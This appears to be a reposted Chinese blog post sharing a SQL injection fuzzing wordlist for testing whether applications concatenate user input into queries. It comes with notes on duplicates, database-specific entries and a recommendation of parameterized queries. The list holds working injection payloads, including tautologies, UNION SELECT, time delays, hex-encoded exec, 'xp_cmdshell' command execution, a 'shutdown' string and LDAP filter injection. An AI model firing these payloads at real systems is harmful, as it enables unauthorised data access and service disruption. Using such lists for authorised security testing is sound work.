SQL注入Fuzzing字典

x33g5p2x  于2022-04-18 转载在 其他  

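需要的自取。这是一份注入测试用的字符串字典,每行一条,用来检查应用是否把用户输入直接拼接进了查询语句。

使用前请注意:列表中有大量重复,第 194–268 项与第 52–126 项基本相同(第 95 项与第 237 项只差 HTML 实体编码),第 164–193 项大多是第 22–51 项的 URL 编码或去掉引号的变体,建议先去重。并非所有条目都是 SQL 注入:第 104–119 项(`|`、`*(|(mail=*))` 等)是 LDAP 过滤器语法,第 98–99 项看起来是 shell 的 sleep 写法。部分条目只对特定数据库有意义:`xp_cmdshell`、`xp_regread`、`waitfor delay`、`sp_password` 属于 SQL Server,`UTL_HTTP.REQUEST`、`bfilename`、`tz_offset` 属于 Oracle。第 154、272 项开头是排版引号 ‘ 而不是 ASCII 单引号。第 20 项(`shutdown`)和带 `xp_cmdshell` 的条目一旦命中会产生实际副作用,不适合放进针对生产环境的自动化测试集。

只要其中任何一条能改变查询结果或引发数据库报错,就说明该处查询是字符串拼接的;修复方式是改用参数化查询,而不是按这份列表做黑名单过滤。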

  1. '
  2. "
  3. #
  4. -
  5. --
  6. ' --
  7. --';
  8. ' ;
  9. = '
  10. = ;
  11. = --
  12. \x23
  13. \x27
  14. \x3D \x3B'
  15. \x3D \x27
  16. \x27\x4F\x52 SELECT *
  17. \x27\x6F\x72 SELECT *
  18. 'or select *
  19. admin'--
  20. ';shutdown--
  21. <>"'%;)(&+
  22. ' or ''='
  23. ' or 'x'='x
  24. " or "x"="x
  25. ') or ('x'='x
  26. 0 or 1=1
  27. ' or 0=0 --
  28. " or 0=0 --
  29. or 0=0 --
  30. ' or 0=0 #
  31. " or 0=0 #
  32. or 0=0 #
  33. ' or 1=1--
  34. " or 1=1--
  35. ' or '1'='1'--
  36. "' or 1 --'"
  37. or 1=1--
  38. or%201=1
  39. or%201=1 --
  40. ' or 1=1 or ''='
  41. " or 1=1 or ""="
  42. ' or a=a--
  43. " or "a"="a
  44. ') or ('a'='a
  45. ") or ("a"="a
  46. hi" or "a"="a
  47. hi" or 1=1 --
  48. hi' or 1=1 --
  49. hi' or 'a'='a
  50. hi') or ('a'='a
  51. hi") or ("a"="a
  52. 'hi' or 'x'='x';
  53. @variable
  54. ,@variable
  55. PRINT
  56. PRINT @@variable
  57. select
  58. insert
  59. as
  60. or
  61. procedure
  62. limit
  63. order by
  64. asc
  65. desc
  66. delete
  67. update
  68. distinct
  69. having
  70. truncate
  71. replace
  72. like
  73. handler
  74. bfilename
  75. ' or username like '%
  76. ' or uname like '%
  77. ' or userid like '%
  78. ' or uid like '%
  79. ' or user like '%
  80. exec xp
  81. exec sp
  82. '; exec master..xp_cmdshell
  83. '; exec xp_regread
  84. t'exec master..xp_cmdshell 'nslookup www.google.com'--
  85. --sp_password
  86. \x27UNION SELECT
  87. ' UNION SELECT
  88. ' UNION ALL SELECT
  89. ' or (EXISTS)
  90. ' (select top 1
  91. '||UTL_HTTP.REQUEST
  92. 1;SELECT%20*
  93. to_timestamp_tz
  94. tz_offset
  95. &lt;&gt;&quot;'%;)(&amp;+
  96. '%20or%201=1
  97. %27%20or%201=1
  98. %20$(sleep%2050)
  99. %20'sleep%2050'
  100. char%4039%41%2b%40SELECT
  101. &apos;%20OR
  102. 'sqlattempt1
  103. (sqlattempt2)
  104. |
  105. %7C
  106. *|
  107. %2A%7C
  108. *(|(mail=*))
  109. %2A%28%7C%28mail%3D%2A%29%29
  110. *(|(objectclass=*))
  111. %2A%28%7C%28objectclass%3D%2A%29%29
  112. (
  113. %28
  114. )
  115. %29
  116. &
  117. %26
  118. !
  119. %21
  120. ' or 1=1 or ''='
  121. ' or ''='
  122. x' or 1=1 or 'x'='y
  123. /
  124. //
  125. //*
  126. */*
  127. '
  128. ' and '' like '
  129. ' AnD '' like '
  130. ' or '' like '
  131. ' and '' like '%
  132. ' aND '' like '%
  133. ' and '' like ''--
  134. ' and 2>1--
  135. ' and 2>3--
  136. ') and ('x'='x
  137. ) and (1=1
  138. 'or''='
  139. 'or'='or'
  140. a' or 1=1--
  141. "a"" or 1=1--"
  142. or a = a
  143. a' or 'a' = 'a
  144. 1 or 1=1
  145. a' waitfor delay '0:0:10'--
  146. 1 waitfor delay '0:0:10'--
  147. declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
  148. declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
  149. declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
  150. declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
  151. a'
  152. ?
  153. ' or 1=1
  154. ‘ or 1=1 --
  155. x' AND userid IS NULL; --
  156. x' AND email IS NULL; --
  157. anything' OR 'x'='x
  158. x' AND 1=(SELECT COUNT(*) FROM tabname); --
  159. x' AND members.email IS NULL; --
  160. x' OR full_name LIKE '%Bob%
  161. 23 OR 1=1
  162. '; exec master..xp_cmdshell 'ping 172.10.1.255'--
  163. '
  164. '%20or%20''='
  165. '%20or%20'x'='x
  166. %20or%20x=x
  167. ')%20or%20('x'='x
  168. 0 or 1=1
  169. ' or 0=0 --
  170. " or 0=0 --
  171. or 0=0 --
  172. ' or 0=0 #
  173. or 0=0 #"
  174. or 0=0 #
  175. ' or 1=1--
  176. " or 1=1--
  177. ' or '1'='1'--
  178. ' or 1 --'
  179. or 1=1--
  180. or%201=1
  181. or%201=1 --
  182. ' or 1=1 or ''='
  183. or 1=1 or ""=
  184. ' or a=a--
  185. or a=a
  186. ') or ('a'='a
  187. ) or (a=a
  188. hi or a=a
  189. hi or 1=1 --"
  190. hi' or 1=1 --
  191. hi' or 'a'='a
  192. hi') or ('a'='a
  193. "hi"") or (""a""=""a"
  194. 'hi' or 'x'='x';
  195. @variable
  196. ,@variable
  197. PRINT
  198. PRINT @@variable
  199. select
  200. insert
  201. as
  202. or
  203. procedure
  204. limit
  205. order by
  206. asc
  207. desc
  208. delete
  209. update
  210. distinct
  211. having
  212. truncate
  213. replace
  214. like
  215. handler
  216. bfilename
  217. ' or username like '%
  218. ' or uname like '%
  219. ' or userid like '%
  220. ' or uid like '%
  221. ' or user like '%
  222. exec xp
  223. exec sp
  224. '; exec master..xp_cmdshell
  225. '; exec xp_regread
  226. t'exec master..xp_cmdshell 'nslookup www.google.com'--
  227. --sp_password
  228. \x27UNION SELECT
  229. ' UNION SELECT
  230. ' UNION ALL SELECT
  231. ' or (EXISTS)
  232. ' (select top 1
  233. '||UTL_HTTP.REQUEST
  234. 1;SELECT%20*
  235. to_timestamp_tz
  236. tz_offset
  237. <>"'%;)(&+
  238. '%20or%201=1
  239. %27%20or%201=1
  240. %20$(sleep%2050)
  241. %20'sleep%2050'
  242. char%4039%41%2b%40SELECT
  243. &apos;%20OR
  244. 'sqlattempt1
  245. (sqlattempt2)
  246. |
  247. %7C
  248. *|
  249. %2A%7C
  250. *(|(mail=*))
  251. %2A%28%7C%28mail%3D%2A%29%29
  252. *(|(objectclass=*))
  253. %2A%28%7C%28objectclass%3D%2A%29%29
  254. (
  255. %28
  256. )
  257. %29
  258. &
  259. %26
  260. !
  261. %21
  262. ' or 1=1 or ''='
  263. ' or ''='
  264. x' or 1=1 or 'x'='y
  265. /
  266. //
  267. //*
  268. */*
  269. a' or 3=3--
  270. "a"" or 3=3--"
  271. ' or 3=3
  272. ‘ or 3=3 --
